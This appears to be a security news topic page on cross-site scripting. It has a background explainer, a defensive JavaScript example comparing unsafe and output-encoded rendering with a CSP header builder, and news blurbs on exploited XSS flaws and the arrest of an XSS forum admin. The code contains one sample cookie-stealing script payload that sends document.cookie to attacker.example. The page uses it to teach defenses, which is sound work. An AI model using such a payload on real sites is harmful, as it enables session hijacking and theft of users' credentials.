Microsoft Exchange Zero-Day Under Attack, No Patch Available
CVE-2026-42897 stems from a cross-site scripting (XSS) vulnerability and can allow an attacker to compromise Outlook Web Access (OWA) mailboxes.
Stay informed on XSS vulnerabilities and defenses with the latest news, expert insights, and security tips on cross-site scripting threats.
Background for this topic.
XSS, or Cross-Site Scripting, is a type of vulnerability in web applications that allows attackers to inject malicious scripts into web pages viewed by other users. This security flaw enables attackers to bypass access controls, such as the same-origin policy, which are designed to segregate different websites from each other. XSS exploits the trust a user has for a particular site, allowing the attacker to send scripts that appear to be from the site itself.
In the context of information security, XSS is a significant concern because it can be used for a range of malicious activities: stealing session tokens, login credentials, or personally identifiable information; defacing websites; or redirecting users to hostile sites. Protecting against XSS requires careful coding practices, above all context-aware output encoding of untrusted data wherever it is written into HTML, attributes, JavaScript, or URLs (input validation helps but is not sufficient on its own), backed by defense-in-depth measures such as a Content Security Policy (CSP) that restricts where scripts may load from. Identifying and mitigating XSS vulnerabilities is crucial for maintaining the integrity and security of web applications.
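To make the two defenses above concrete, here is an added example (written for this page, not code from any of the products or articles listed below). It renders a search results heading first by concatenating the untrusted query straight into HTML, then with HTML output encoding, and builds a nonce-based Content-Security-Policy header value. The function names, the CSP directive set, and the `containsScriptTag` check are illustrative assumptions; the nonce is passed in by the caller and, in a real server, would be generated fresh per response from a CSPRNG such as Node's `crypto.randomBytes`.

```javascript
// Added example (not from the page): reflected-XSS-prone rendering vs. the
// output-encoded form, plus a CSP header value. Plain Node.js, no framework.

// Characters that change meaning inside an HTML text or attribute context.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// HTML-encode an untrusted value for use in HTML text and quoted attributes.
// Not sufficient for JavaScript, URL, or CSS contexts, which need their own encoders.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the search term from the request lands in the page unchanged,
// so a query such as <script>...</script> is interpreted as markup.
function renderSearchPageUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: the same value is encoded before it enters an HTML text context.
function renderSearchPageSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude detector used only to demonstrate the difference in the test below:
// does the rendered markup contain a raw <script ...> opening tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Builds the Content-Security-Policy header value. Only scripts from the
// page's own origin, or inline scripts carrying this response's nonce, run;
// object-src and base-uri are locked down to close common bypasses.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}

// Constructed sample input: a cookie-exfiltration payload of the kind an
// attacker would place in a link to a reflected-XSS endpoint.
const samplePayload =
  '<script>location="https://attacker.example/?c="+document.cookie</script>';

module.exports = { escapeHtml, renderSearchPageUnsafe, renderSearchPageSafe, containsScriptTag, buildCsp, samplePayload };
```

Encoding is a second line of defense behind the CSP only if the policy actually forbids inline script: a policy that includes `'unsafe-inline'` in `script-src`, or omits `object-src`, leaves a reflected payload like the one above executable even when the nonce is present.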
On Thursday, Microsoft shared mitigations for a high-severity Exchange Server vulnerability exploited in attacks that allow threat actors to execute arbitrary code via cross-site scripting (XSS) while targeting Outlook on the web users. [...]
Microsoft has disclosed a new security vulnerability impacting on-premises versions of Exchange Server that it said has come under active exploitation in the wild.
Over 10,000 Zimbra Collaboration Suite (ZCS) instances exposed online are vulnerable to ongoing attacks exploiting a cross-site scripting (XSS) security flaw. [...]
Germany's Federal Criminal Police Office (aka BKA or the Bundeskriminalamt) has unmasked the real identities of two of the key figures associated with the now-defunct REvil (aka Sodinokibi) ransomware-as-a-service (RaaS) operation.
Cybersecurity researchers have disclosed a vulnerability in Anthropic's Claude Google Chrome Extension that could have been exploited to trigger malicious prompts simply by visiting a web page.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged government agencies to apply patches for two security flaws impacting Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint, stating they have been actively exploited in the wild.
CISA has ordered U.S. government agencies to secure their servers against an actively exploited vulnerability in the Zimbra Collaboration Suite (ZCS). [...]
PLUS: Firefox adds XSS protection; leadership turnover at CISA; FTC exempts some data collection. Infosec In Brief: DNS vulnerabilities are being addressed 84 percent faster in the UK public sector thanks to an automated vulnerability scanning system established as part of a program kicked off early last year. [...]
Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer, allowing them to gather crucial insights on one of the threat actors using the malware in their operations.
A cross-site scripting (XSS) flaw in the web-based control panel used by operators of the StealC info-stealing malware allowed researchers to observe active sessions and gather intelligence on the attackers' hardware. [...]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog to include a security flaw impacting OpenPLC ScadaBR, citing evidence of active exploitation.
A now-patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military.
On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle "Toha." Here's a deep dive on what's knowable about Toha, and a short stab at who got nabbed.
React conquered XSS? Think again. That's the reality facing JavaScript developers in 2025, where attackers have quietly evolved their injection techniques to exploit everything from prototype pollution to AI-generated code, bypassing the very frameworks designed to keep applications secure.
Also: Clorox Sues IT Vendor Over Password Blunder. This week, XSS forum admin arrested, Clorox sued Cognizant, Lumma Stealer is back, NY regulates water, U.S. maritime cybersecurity rules in effect, new Coyote banking Trojan, a hacker nabbed details of Mexico City auxiliary police, Latin America cyberattacks, and World Leaks stole synthetic data.
The arrest of a suspected administrator for the popular cybercrime forum was one of several enforcement actions in the past week targeting malicious activity.
Europol on Monday announced the arrest of the suspected administrator of XSS.is (formerly DaMaGeLaB), a notorious Russian-speaking cybercrime platform.
The suspected administrator of the Russian-speaking hacking forum XSS.is was arrested by the Ukrainian authorities yesterday at the request of the Paris public prosecutor's office. [...]